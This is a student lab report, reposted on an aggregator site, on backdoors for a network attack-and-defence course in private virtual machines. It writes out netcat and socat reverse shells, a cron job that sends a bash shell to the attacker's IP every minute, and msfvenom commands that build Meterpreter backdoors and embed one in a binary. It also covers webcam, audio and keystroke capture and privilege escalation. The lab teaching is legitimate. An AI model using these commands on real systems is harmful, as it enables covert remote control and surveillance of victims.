20232411 2025-2026-1 《网络与系统攻防技术》实验二实验报告

news/2025/10/22 22:01:16/文章来源:https://www.cnblogs.com/20232411dyx/p/19152877

1.实验内容

掌握后门原理及免杀技术。
问题回答:

  1. 例举你能想到的一个后门进入到你系统中的可能方式?
    回答:同一网络的其他计算机遭到攻击,后门通过网络绕过防火墙进入到我系统中。
  2. 例举你知道的后门如何启动起来(win及linux)的方式?
    回答:Windows 系统:注册表启动项,计划任务,服务,启动文件夹;
    Linux 系统:Cron 作业,SSH 公钥授权,系统服务,RC.Local 或 Init.d 脚本,替换系统工具。
  3. Meterpreter有哪些给你映像深刻的功能?
    回答:灵活生成后门,注入恶意代码,进行提权这些功能都令我印象深刻,还有,启动时生成的字符画真挺炫。
  4. 如何发现自己有系统有没有被安装后门?
    回答:可以通过杀软检测,分析网络流量,查看系统日志等。

2.实验过程

1.使用netcat获取主机操作Shell,cron启动某项任务

(1)本实验使用windows作为攻击机,kali虚拟机作为目标机,首先在windows攻击机上安装netcat,并查看攻击机ip,完成准备。
image
(2)在攻击机上监听端口。
image
(3)在目标机建立反向连接,获取Shell权限。
image
image
(4)已获取shell权限,接下来设置cron任务,选择代码* * * * * /usr/bin/touch /home/kali/桌面/file_$(date +\%Y\%m\%d_\%H\%M\%S).txt,作用为每隔一分钟在目标机桌面上生成一个名称为当前时间的txt文本。

  • 由于windows和linux转码问题,汉字“桌面”不能正常显示与传输,需要查看“桌面”的实际对应文字
    image
  • 修改代码为* * * * * /usr/bin/touch /home/kali/妗岄潰/file_$(date +\%Y\%m\%d_\%H\%M\%S).txt,并创建承载该代码的中间文件,并将其加载到crontab中
    image
  • 验证加载情况,并清除中间文件
    image
    (5)验证cron任务执行结果
    image

2.使用socat获取主机操作Shell, 任务计划启动

(1)本实验同实验一几乎一致,但由于windows上不便安装socat,采用kali作为攻击机,另一台openEuler虚拟机作为目标机,查看攻击机ip。
image
(2)kali自带socat,使用socat在攻击机监听。
image
(3)在目标机建立反向连接,获取Shell权限。
image
image
(4)选择代码* * * * * socat TCP:192.168.215.132:6666 EXEC:/bin/bash进行计划启动,即每隔一分钟发送一次shell到攻击机上,进行攻击
image
(5)验证cron任务执行结果:可以看见cron任务执行后,先前传输的指令依序得到执行
image

3.使用MSF meterpreter(或其他软件)生成可执行文件(后门),利用ncat或socat传送到主机并运行获取主机Shell

(1)本实验采用kali虚拟机,攻击win11目标机,首先查看攻击机ip。
image
(2)使用MSF生成后门,选择的生成语句为msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.215.132 LPORT=4444 -f exe -o backdoor20232411.exe
image
(3)使用ncat传输后门程序。
image
image
(4)启动MSF监听。
image
image
(5)在windows上运行后门程序,等待攻击完成,然后用ls命令验证实验结果。
image

4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权

(1)本实验同实验三步骤基本一致,但采用更复杂全面的后门程序,选择的生成语句为msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.215.132 LPORT=4444 -f exe --platform windows -o advanced_backdoor20232411.exe
image
(2)使用ncat将后门程序传输到windows上,并在kali上启动MSF监听。
image
image
(3)在windows上运行后门程序,尝试获取目标主机音频、摄像头、击键记录。

  • 音频:
    image
  • 摄像头:
    image
    image
  • 击键记录:
    image
    (4)使用getsystem指令尝试提权,可以看见提权成功。
    image

5.使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

(1)本实验使用kali虚拟机进行自攻击,选用后门生成语句msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.215.132 LPORT=4444 -x pwn1 -f elf > pwn20232411,该语句将Meterpreter反向连接代码嵌入到pwn1中,并生成新的恶意后门pwn20232411。
image
(2)对后门程序pwn20232411进行提权,确保其有执行权限。
image
(3)进行MSF监听。
image
(4)运行后门程序,并验证实验结果。
image
image

3.问题及解决方案

  • 问题1:无法使用crontab -e编写命令,编辑器不能正常加载
  • 问题1解决方案:提前将cron任务代码写在一个文件中,并通过crontab <文件名>进行加载
  • 问题2:代码* * * * * /usr/bin/touch /home/kali/桌面/file_$(date +\%Y\%m\%d_\%H\%M\%S).txt中“桌面”二字在kali中呈现乱码
  • 问题2解决方案:这是转码问题,提前使用pwd命令查看kali中“桌面”二字在windows shell中的显示并替换,即* * * * * /usr/bin/touch /home/kali/妗岄潰/file_$(date +\%Y\%m\%d_\%H\%M\%S).txt
  • 问题3:Kali虚拟机建立Meterpreter会话后,立刻关闭
  • 问题3解决方案:经过多种途径寻找解决方案都无果,最终在毕悠尘同学的报告中找到同样的问题与解答,按照毕悠尘同学的方案更新了Metasploit框架及其所有依赖项解决

4.学习感悟、思考等

本次实验对我来说十分艰难,通过多方查找资料,与ai进行大量“谈心”,才勉强做出来。但这提高了我查找资料的经验,对后门也有了一个粗浅的认识。最后,这次实验虽然难,但真的很有意思。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/943784.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Lampiao 靶场

nmap起手访问80页面访问1898有两个文件一个音频,一个图片 音频说了 tiagodirb目录枚举 dirb http://192.168.1.71:1898 扫描一下敏感信息生成字典 cewl http://192.168.1.71:1898/?q=node/1 -w lam.txt 爆破一下ssh h…

【学习笔记】slope-trick

[BalticOI 2004] Sequence (Day1) \(f_{i,x}\) 表示考虑前 \(i\) 个位置,当前放了 \(x\)。转移式如下: \[f_{i,x} = |a_i - x| + f_{i - 1,x} \]考虑建坐标系,有点 $(x,f_{i,x})。然后它就相当于给当前的函数加上个…

2025.10.22

今天早八上了离散数学,然后上了马原课,中午外卖到的时间很好,不太好吃,下次不点了,然后睡觉睡了一下午,晚上上音乐鉴赏课,然后去科技楼开部长例会。

有一云AI编辑器:2025年微信公众号排版的高效选择

作为个人自媒体运营者,你是否还在为公众号编辑器排版而头疼?写稿、找图、排版、分发……每一个环节都可能耗费大量时间。为了帮助大家找到最适合自己的工具,我亲测了市面上8款主流的微信公众号编辑器,从功能完整度…

20232318 2025-2026-1 《网络与系统攻防技术》实验二实验报告

一、实验核心原理与内容解析 本次实验聚焦 “后门原理与实践”,核心是通过工具配置、定时触发、漏洞利用等手段,实现对目标主机的远程控制与信息窃取,同时理解后门的植入、启动与隐藏机制。实验内容涵盖五类典型场景…

ubuntu 25.10 修改源 - ldx

ubuntu 25.10 修改源# Ubuntu sources have moved to /etc/apt/sources.list.d/ubuntu.sourcessudo gedit /etc/apt/sources.list.d/*.list

pytorch学习笔记(1)

pytorch的模块 Pytorch 官方文档链接: https://pytorch.org/docs/stable torch.nn:神经网络相关api torch.option: 优化算法 torch.utils.data : dataset,dataLoader1.pytorch和tensorflow区别2.tensor(向量)相关操作…

20232404 2025-2026-2 《网络与系统攻防技术》实验二实验报告

一、实验内容 (一)主要内容掌握后门核心原理。 学会如何设置后门,如netcat、socat、MSF meterpreter等工具的使用。 熟悉Linux与Windows系统的后门启动机制。(二)回答问题 (1) 例举你能想到的一个后门进入到你系统…

1020302118兰逸霏的第一次作业

作业一 1.用requests和BeautifulSoup库方法定向爬取给定网址(http://www.shanghairanking.cn/rankings/bcur/2020 )的数据,屏幕打印爬取的大学排名信息。排名 学校名称 省市 学校类型 总分1 清华大学 北京 综合 852…

MathType 7下载安装教程及激活教程wps嵌入教程(含下载+安装+汉化激活+安装包)

目录一、写在前面:为啥这篇MathType 7教程一定要看?二、先搞懂:MathType 7为啥是教育/科研必备?三、第一步:MathType 7安装包下载(2025实测无病毒,直链速取)四、核心步骤:MathType 7安装+汉化激活(每步带避坑…

论学习有感——驳学习(读书)无用论

从读书以来学习已经二十年有余,一直依靠着天分和性情在体制化的学习道路上浑浑噩噩的深造。有些许个问题,长期以来也没个自己的答案,顺着接受校方和老师的短期目标,也就一直这么过来了。近年来,随着社会上一些争执…

嵌入式软件分层架构设计 - lucky

一、什么是嵌入式分层架构 “嵌入式分层架构”并不是一个全新的架构类型,而是指在嵌入式系统开发中应用和实现分层架构的设计模式,它继承了通用分层架构的所有核心思想和优点,但根据嵌入式系统的独特约束和需求进行…

DP 基础题乱做

恶补基础 DP. CF1061C 多样性 转移是经典的子序列 DP,考虑前 \(i\) 个数,子序列长度为 \(j\) 的方案数. 转移: \[f_{i,j}=\begin{cases} f_{i-1,j-1}+f_{i-1,j}&j\mid a_i\\ f_{i-1,j}&otherwise. \end{cas…

20232315 2025-2026-1 《网络与系统攻防技术》实验二实验报告

20232315 2025-2026-1 《网络与系统攻防技术》实验二实验报告20232315 2025-2026-1 《网络与系统攻防技术》实验二实验报告 目录一、实验基本信息二、实验内容三、实验要求四、实验过程4.1使用netcat获取主机操作Shell…

2025-10-21 XQQ Round 赛后总结

赛时心路历程开 T1,然后 think 一会就秒掉了。大洋里一遍过。 开 T2,然后 think 一会就秒掉了。大洋里也是一遍过。 15:48 think T3,结果假了。但是注意到在 \(m=0\) 的时候是对的,10 分也是分。 16:25 想不到 T3。…

《中华人民共和国网络安全法》第二十一条这一核心考点

《网络安全法》第二十一条 考点精析 法条原文:国家实行网络安全等级保护制度。网络运营者应当按照网络安全等级保护制度的要求,履行下列安全保护义务,保障网络免受干扰、破坏或者未经授权的访问,防止网络数据泄露或…

二三级区别

等保第二级 vs 第三级核心差异及考点精析 核心关系:第二级是 “指导防护” ,第三级是 “强制管控、增强审计” 。从二级到三级是质的飞跃,而非简单量的增加,这正是考试的重点。核心差异对比与考点解析控制领域 核心…

小红书 404 重定向

function clientRedirect(e) { window.location.href = e, setTimeout(function() { window.location.href = e }, 100), setTimeout(function() { …

第九章-Where-1S-tHe-Hacker

第九章-Where-1S-tHe-Hacker 1、通过本地 PC RDP到服务器并且找到黑客ID 为多少,将黑客ID 作为 FLAG 提交; 这里一定一定要先把windows安全中心关了。不然会影响后门题目正常做从这里看到了管理员账户和密码,我们先看…

CF 2023D Many Games

huiyoude上界卡不来,怎么这么菜??? 下文的概率都是指的 \(\frac{p}{100}\)。 首先有一个想法就是直接背包,但是 \(\prod p\) 涉及不小的数的乘积并不好放入状态,所以考虑设 \(f_s\) 表示 \(\sum w = s\) 的最大概…